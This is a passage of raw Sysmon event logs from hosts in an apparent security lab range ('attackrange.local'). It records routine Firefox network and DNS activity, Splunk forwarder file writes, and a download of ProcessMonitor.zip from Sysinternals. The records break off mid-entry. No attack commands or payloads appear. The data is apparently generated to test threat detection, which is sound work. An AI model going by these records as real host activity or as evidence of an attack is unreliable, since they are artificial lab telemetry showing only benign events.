354300x8000000000000000288466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.401{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local54476-false142.250.186.34fra24s04-in-f2.1e100.net443https 354300x8000000000000000288465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.401{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54650- 354300x8000000000000000288464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.400{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61827- 354300x8000000000000000288463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.398{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54475- 354300x8000000000000000288462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.398{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56070- 354300x8000000000000000288556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.377{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60737- 354300x8000000000000000288555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.376{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51866- 354300x8000000000000000288554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.363{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60700- 354300x8000000000000000288553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.255{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55036- 23542300x8000000000000000288552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.833{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96C3149A5BCF900E1CC3F1D451631E78,SHA256=CB94D3FF240D0706DE295A7632E41F5A7EC756CBB183FFF9AB0F1DFECFF98E31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:33.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BCC817E9228F60C696BB813CDE5B6F,SHA256=9275067E95CAE8FEBBC581E16C1259FE9CF68A0FD3187FDA8DCFE3FEA7310D96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.561{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.488{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+eb71a2|C:\Program Files\Mozilla Firefox\xul.dll+b937e2|C:\Program Files\Mozilla Firefox\xul.dll+270212|C:\Program Files\Mozilla Firefox\xul.dll+26ffea|C:\Program Files\Mozilla Firefox\xul.dll+ecf9af|C:\Program Files\Mozilla Firefox\xul.dll+1b32ca7|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b36276|C:\Program Files\Mozilla Firefox\xul.dll+1788539|C:\Program Files\Mozilla Firefox\xul.dll+f03766|C:\Program Files\Mozilla Firefox\xul.dll+1b2ffc7|C:\Program Files\Mozilla Firefox\xul.dll+1788d0f|C:\Program Files\Mozilla Firefox\xul.dll+1b261b1|C:\Program Files\Mozilla Firefox\xul.dll+efae9e|C:\Program Files\Mozilla Firefox\xul.dll+efad05|C:\Program Files\Mozilla Firefox\xul.dll+efa894|C:\Program Files\Mozilla Firefox\xul.dll+efa34b|C:\Program Files\Mozilla Firefox\xul.dll+efaf6f|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f 10341000x8000000000000000288549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.475{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+eb71a2|C:\Program Files\Mozilla Firefox\xul.dll+b937e2|C:\Program Files\Mozilla Firefox\xul.dll+270212|C:\Program Files\Mozilla Firefox\xul.dll+26ffea|C:\Program Files\Mozilla Firefox\xul.dll+ecf9af|C:\Program Files\Mozilla Firefox\xul.dll+1b32ca7|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b36276|C:\Program Files\Mozilla Firefox\xul.dll+1788539|C:\Program Files\Mozilla Firefox\xul.dll+1b25f13|C:\Program Files\Mozilla Firefox\xul.dll+efae9e|C:\Program Files\Mozilla Firefox\xul.dll+efad05|C:\Program Files\Mozilla Firefox\xul.dll+efa894|C:\Program Files\Mozilla Firefox\xul.dll+efa34b|C:\Program Files\Mozilla Firefox\xul.dll+efaf6f|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f 23542300x8000000000000000288548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.392{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Local\Temp\080sDlRy.zip.partMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.364{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\permissions.sqlite-journalMD5=CCEB35E740742E5C5CBDBDAD0F272140,SHA256=B43D1F4EF7556C3B51EBD9DC1892A7A3045ECD475DDD83E651C21F66C247C66A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.340{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A32249B8D02BC88343500D12D7C1D05F,SHA256=C786D403AF23889672F9886B774669F0077DB53EE77BE2B31CC9A9B697A7226C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:34.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E72D692F0F785EB9E2B60FB49C1BA9D1,SHA256=AB9EAD87926223C8C19FD20CA1F4CE4D3510068820C622073AB747FF402D2C9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:34.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F35401A87F9C3324AB6BECA697D628CD,SHA256=98B8FBB1D709DAFDDA1B6EE4923F46873E43C1EB42950889141A30D132E14A32,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.853{C8EA50B7-11AA-6216-1605-000000003802}2228download.sysinternals.com0type: 5 az155186.vo.msecnd.net;type: 5 cs22.wpc.v0cdn.net;::ffff:152.199.19.160;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.400{C8EA50B7-11AA-6216-1605-000000003802}2228onedscolprdcus03.centralus.cloudapp.azure.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.390{C8EA50B7-11AA-6216-1605-000000003802}2228onedscolprdcus03.centralus.cloudapp.azure.com013.89.178.27;C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000288564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.977{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53484-false13.89.178.27-443https 354300x8000000000000000288563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.974{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53483-false13.89.178.27-443https 354300x8000000000000000288562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.846{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53481-false13.89.178.27-443https 354300x8000000000000000288561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.842{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53482-false152.199.19.160-443https 354300x8000000000000000288560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.841{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55614- 354300x8000000000000000288559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.841{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61038- 354300x8000000000000000288558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.837{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59330- 354300x8000000000000000288557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.483{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53480-false13.89.178.27-443https 354300x8000000000000000288582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.274{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61931- 23542300x8000000000000000288581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.887{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1912B5DC4BEA73EA7030CA06C45BA7E,SHA256=0885860228D1444E894A2CE4F37D872ECDAD7C4B7FF0453141647AB4DA932C74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:35.764{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81645881D7D1A2D89CBA589FF3EC2674,SHA256=F5A32B4F0EA5B1D101F0C3804B01FC8E5F9BF0936E6DA2405421E4957713D502,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.856{C8EA50B7-11AA-6216-1605-000000003802}2228cs22.wpc.v0cdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.854{C8EA50B7-11AA-6216-1605-000000003802}2228cs22.wpc.v0cdn.net0152.199.19.160;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.737{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\20083MD5=07F32E6842096E9F54E10295D2BAF16A,SHA256=EC8AB7462CE2C5FA997D4AA5E5E8E0D231EAA7929F7D909DF43A3AADBF901E50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.670{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-walMD5=3A5DEAC0245C6255D5370E6DAF507147,SHA256=54A6B19275F084FFB9AA6DD26C6248572BB95EC3E14FD32821D009EB2E3E7AB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.668{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-shmMD5=4CE73614944060D4063AF15782DE8569,SHA256=5C947A09400CDB2C1D1B8AB0B37E704510754CDC7CB5BCA069FB5BB87FE61EF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.662{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=517FCDB64A217F851F1B91A24A21C1AA,SHA256=0C93AAE6DBB67DBE171A3D550AA551177702F6160E9F5AD03B4433F0B9703C58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.641{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++www.google.com\ls\usageMD5=4AB11D9C3489FCE21CAD42D7392F2FD7,SHA256=F469D1CBE62A92423587794132F775CA025DFAF059A35BACF39214B3943CCF26,IMPHASH=00000000000000000000000000000000falsetrue 15241500x8000000000000000288573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.332{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\ProcessMonitor.zip:Zone.Identifier2022-02-23 10:51:33.390MD5=6CF8D17189BCA447B9FC5828CC9CD388,SHA256=4EE035B131155057E128FB6EFFCE796BB1FD10600AF5E7E075FE5119E088B0AF,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 ReferrerUrl=https://docs.microsoft.com/ HostUrl=https://download.sysinternals.com/files/ProcessMonitor.zip 11241100x8000000000000000288572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:35.332{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\ProcessMonitor.zip:Zone.Identifier2022-02-23 10:51:33.390 15241500x8000000000000000288571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.291{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\ProcessMonitor.zip2022-02-23 10:51:33.390MD5=41ADD444B37945E9F5442459B1A40079,SHA256=99B5BC8DC724B1629354F9FF235818BE3428DDCB36438EB9825F3AE270F708AE,IMPHASH=00000000000000000000000000000000- 10341000x8000000000000000288570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.168{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000288569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:35.141{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\ProcessMonitor.zip2022-02-23 10:51:35.140 23542300x8000000000000000216761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:36.873{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE2C03B2C19499EFD7E6B485E8B0B279,SHA256=EDACBA0ACB9193E5BD3E81EA20388C0AE25E92044F618E7A825EA0D8DEC91C23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.961{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-walMD5=4E8C8365EE9393F435CFD27FD73DFE8B,SHA256=541F80CABE28AF17740BE029EF0A476BC1B1744A889C4CCD9C4828FF5DB2AB0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.959{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-shmMD5=675E8D26A4C0DE0FFCF5250C2BDAB3F7,SHA256=25F925DF2D84339F51BB5FC82727FC1F2612A3BE8593DA9B9FA1EAB25106AD46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.952{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++docs.microsoft.com\ls\data.sqlite-journalMD5=222CB242E31AF89B4CB6A7D2A3EB0559,SHA256=E59CA5EB326C1899D6C95B116321BA4DE90EE9C1689132B15D96F8FC1E6DDCC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:35.117{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52237- 354300x8000000000000000288588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:34.718{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53486-false216.58.212.170ams15s22-in-f10.1e100.net443https 354300x8000000000000000288587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:33.590{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53485-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.924{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++docs.microsoft.com\ls\data.sqlite-journalMD5=F217CD9E474B00114B2CF424A1F325A9,SHA256=B3F72BC06F37FE9A10BAA050878ACB3DD842B43572A860C55AFD79ECDC45A02F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.911{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla 